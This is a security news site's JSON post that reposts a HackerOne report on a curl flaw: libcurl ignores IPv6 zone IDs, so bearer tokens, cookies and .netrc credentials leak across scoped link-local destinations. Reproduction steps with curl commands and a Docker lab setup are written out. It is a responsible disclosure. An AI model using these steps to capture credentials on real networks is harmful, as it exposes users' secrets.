{"id":47912,"date":"2026-04-19T17:37:02","date_gmt":"2026-04-19T17:37:02","guid":{"rendered":"http:\/\/localhost\/?p=47912"},"modified":"2026-04-19T17:37:02","modified_gmt":"2026-04-19T17:37:02","slug":"curl-libcurl-omits-ipv6-zoneid-from-host-identity-and-leaks-credentialscookies-across-scoped-link-lo","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47912","title":{"rendered":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\nlibcurl omits the IPv6 zoneid component from multiple security-sensitive host identity decisions even though the connection layer still routes by zoneid.  As a result, two distinct scoped\/link-local destinations such as [fe80::X%zoneA] and [fe80::X%zoneB] are treated as the same host by redirect credential guards, cookie identity, and .netrc lookup.  I reproduced three consequences: redirect-protected secrets are forwarded cross-zone, host-only cookies cross-zone, and .netrc credentials apply cross-zone.  This reproduces on my local checkout (curl 8.19.0-DEV), my local master build (curl 8.20.0-DEV), and the installed system curl \/usr\/bin\/curl 8.19.0 on Kali Linux.  This appears distinct from CVE-2022-27775, which was about connection reuse \/ conncache keying rather than redirect, cookie, and credential host identity.  The root cause is that zoneid is ignored in security-sensitive host comparisons but still used later as scope_id for actual routing.\\n\\n## Affected version\\nInstalled system curl:\\n\\ncurl 8.19.0 (x86_64-pc-linux-gnu) libcurl\/8.19.0 OpenSSL\/3.5.5 zlib\/1.3.1 brotli\/1.2.0 zstd\/1.5.7 libidn2\/2.3.8 libpsl\/0.21.5 libssh2\/1.11.1 nghttp2\/1.68.1 ngtcp2\/1.21.0 nghttp3\/1.15.0 librtmp\/2.3 mit-krb5\/1.22.1 OpenLDAP\/2.6.10\\nRelease-Date: 2026-03-11, security patched: 8.19.0-1\\nProtocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns ldap ldaps mqtt mqtts pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp ws wss\\nFeatures: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTP3 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd\\n\\nAlso reproduced on:\\n\\ncurl 8.19.0-DEV (Linux) libcurl\/8.19.0-DEV &#8230;\\ncurl 8.20.0-DEV (Linux) libcurl\/8.20.0-DEV &#8230;\\n\\nPlatform:\\n\\nLinux kali 6.12.38+kali-amd64 x86_64 GNU\/Linux\\n\\n\\n## Steps To Reproduce:\\nI used a local Docker lab with two different IPv6 bridge networks. Two containers are given the same MAC address so they receive the same link-local IPv6 address on different interfaces, which creates two distinct scoped destinations with the same numeric\\nfe80:: address.\\n\\n### Repro 1: redirect-protected secrets leak cross-zone\\n\\n1. Create two Docker IPv6 bridge networks, netA and netB.\\n2. Start container A on netA and container B on netB, both with the same MAC address.\\n3. Container A returns:\\n\\nHTTP\/1.0 302 Found\\nLocation: http:\/\/[fe80::42:acff:fe11:2%25br-B]:18080\/target\\n\\n4. Request:\\n\\ncurl -g -v -L &#8211;noproxy &#8216;*&#8217; &#8211;oauth2-bearer s3cr3t \\\\\\n  \\&#8221;http:\/\/[fe80::42:acff:fe11:2%25br-A]:18080\/start\\&#8221;\\n\\n5. Observe that curl follows the redirect and still sends:\\n\\nAuthorization: Bearer s3cr3t\\n\\n6. The second container receives it:\\n\\nB-installed path=\/bearer\/target auth=Bearer s3cr3t cookie=None\\n\\nI reproduced the same redirect leak shape with:\\n\\n- -u user:secret\\n- &#8211;oauth2-bearer s3cr3t\\n- -H &#8216;Authorization: s3cr3t&#8217;\\n- -H &#8216;Cookie: test=yes&#8217;\\n\\nThis happens without &#8211;location-trusted \/ CURLOPT_UNRESTRICTED_AUTH.\\n\\n### Repro 2: host-only cookies cross-zone\\n\\n1. Make %zoneA return:\\n\\nSet-Cookie: sid=zonepoison; Path=\/\\n\\n2. Seed the cookie jar:\\n\\ncurl -g -v &#8211;noproxy &#8216;*&#8217; -b &#8221; -c jar.txt \\\\\\n  \\&#8221;http:\/\/[fe80::42:acff:fe11:2%25br-A]:18080\/seed\\&#8221;\\n\\n3. The jar stores:\\n\\nfe80::42:acff:fe11:2  FALSE   \/       FALSE   0       sid     zonepoison\\n\\n4. In a fresh invocation, request %zoneB:\\n\\ncurl -g -v &#8211;noproxy &#8216;*&#8217; -b jar.txt \\\\\\n  \\&#8221;http:\/\/[fe80::42:acff:fe11:2%25br-B]:18080\/check\\&#8221;\\n\\n5. Observe:\\n\\nCookie: sid=zonepoison\\n\\n6. The second container receives it:\\n\\nB-installed path=\/check auth=None cookie=sid=zonepoison\\n\\n\\n### Repro 3: .netrc credentials apply cross-zone\\n\\n1. Create .netrc:\\n\\nmachine fe80::42:acff:fe11:2 login user password secret\\n\\n2. Request %zoneA:\\n\\ncurl -g -v &#8211;basic &#8211;netrc-file netrc &#8211;noproxy &#8216;*&#8217; \\\\\\n  \\&#8221;http:\/\/[fe80::42:acff:fe11:2%25br-A]:18080\/a\\&#8221;\\n\\n3. Request %zoneB with the same file:\\n\\ncurl -g -v &#8211;basic &#8211;netrc-file netrc &#8211;noproxy &#8216;*&#8217; \\\\\\n  \\&#8221;http:\/\/[fe80::42:acff:fe11:2%25br-B]:18080\/b\\&#8221;\\n\\n4. Both requests send:\\n\\nAuthorization: Basic dXNlcjpzZWNyZXQ=\\n\\n5. The second container receives:\\n\\nB-installed path=\/b auth=Basic dXNlcjpzZWNyZXQ= cookie=None\\n\\n### Why this happens\\n\\nThe relevant code paths appear to be:\\n\\n- lib\/urlapi.c::Curl_url_same_origin() compares scheme\/host\/port but ignores CURLUPART_ZONEID\\n- lib\/http.c stores first_host = conn-\\u003ehost.name\\n- lib\/vauth\/vauth.c::Curl_auth_allowed_to_host() compares only host\/port\/protocol\\n- lib\/http.c \/ lib\/cookie.c key cookies on normalized host strings without zoneid\\n- lib\/url.c performs .netrc lookup using conn-\\u003ehost.name\\n- lib\/url.c::zonefrom_url() later extracts CURLUPART_ZONEID and sets conn-\\u003escope_id\\n\\n### Expected result\\n\\n[fe80::X%zoneA] and [fe80::X%zoneB] should be treated as different security identities for:\\n\\n- redirect credential forwarding\\n- protected custom headers\\n- host-only cookie storage and selection\\n- .netrc host credential lookup\\n\\n## Impact\\n\\n## Summary:\\nAn attacker controlling one scoped\/link-local IPv6 origin, or an open redirect on it, can cause curl\/libcurl to send secrets to a different scoped destination that has the same numeric fe80:: address on another interface.\\nThis includes built-in credentials, Bearer tokens, protected custom headers, host-only cookies, and .netrc credentials.\\nThe bug breaks trust boundaries between distinct link-local realms and can affect multi-homed systems, local automation, containers, service meshes, and other environments where scoped IPv6 addresses are used.\\nThe impact is confidentiality loss and cross-realm state confusion without any explicit opt-in such as &#8211;location-trusted \/ CURLOPT_UNRESTRICTED_AUTH.\\nThe attack surface is narrower than a generic internet-wide cross-host leak, so I would rate it Medium, but it is a real security boundary failure and not expected behavior.&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T18:59:24&#8243;,&#8221;modified&#8221;:&#8221;2026-04-19T21:50:12&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3680680&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2022-27775&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.5,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3680680&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\nlibcurl omits the IPv6 zoneid component from multiple security-sensitive host identity decisions even though the connection layer still routes by zoneid. As a result,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,16,12,117,15,13,7,11,5],"class_list":["post-47912","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-hackerone","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47912\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:nlibcurl omits the IPv6 zoneid component from multiple security-sensitive host identity decisions even though the connection layer still routes by zoneid. As a result,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47912\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-19T17:37:02+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\\\/cookies across scoped link-local realms_H1:3680680\",\"datePublished\":\"2026-04-19T17:37:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912\"},\"wordCount\":1035,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"hackerone\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47912#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912\",\"name\":\"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\\\/cookies across scoped link-local realms_H1:3680680 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-19T17:37:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47912\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47912#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\\\/cookies across scoped link-local realms_H1:3680680\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47912","og_locale":"en_US","og_type":"article","og_title":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:nlibcurl omits the IPv6 zoneid component from multiple security-sensitive host identity decisions even though the connection layer still routes by zoneid. As a result,...","og_url":"https:\/\/zero.redgem.net\/?p=47912","og_site_name":"zero redgem","article_published_time":"2026-04-19T17:37:02+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47912#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47912"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680","datePublished":"2026-04-19T17:37:02+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47912"},"wordCount":1035,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","hackerone","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47912#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47912","url":"https:\/\/zero.redgem.net\/?p=47912","name":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-19T17:37:02+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47912#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47912"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47912#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: libcurl omits IPv6 zoneid from host identity and leaks credentials\/cookies across scoped link-local realms_H1:3680680"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47912","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47912"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47912\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47912"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47912"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47912"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}